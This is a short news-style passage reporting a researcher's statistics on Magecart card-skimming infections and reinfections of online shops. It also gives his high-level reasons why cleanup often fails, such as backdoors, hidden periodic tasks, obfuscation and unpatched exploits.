Researchers have tracked Magecart-like infections on more than 40,000 domains since 2015. The researcher says that during August, September, and October, his scanner detected Magecart-like card skimming malware on over 5,400 domains. 21.3 percent of the cleaned shops got reinfected. A large number of reinfections occurred within the first day, or after a week, but on average, the reinfection time was 10.5 days. |
"This shows that countermeasures taken by merchants and their contracted security firms often fail. There are multiple reasons for this," the researcher said. The expert listed: 1/ Magecart operatives often litter a hacked store with backdoors and rogue admin accounts. 2/ Magecart operatives use reinfection mechanisms such as database triggers and hidden periodic tasks to reinstate their payload. 3/ Magecart operatives use obfuscation techniques to make their presence indistinguishable from legitimate code. 4/ Magecart operatives utilize unpublished security exploits (aka 0days) to hack sites, exploits for which there are no patches. "All in all, it takes some very keen eyes and a lot of effort to clean all traces of a breach," he said. |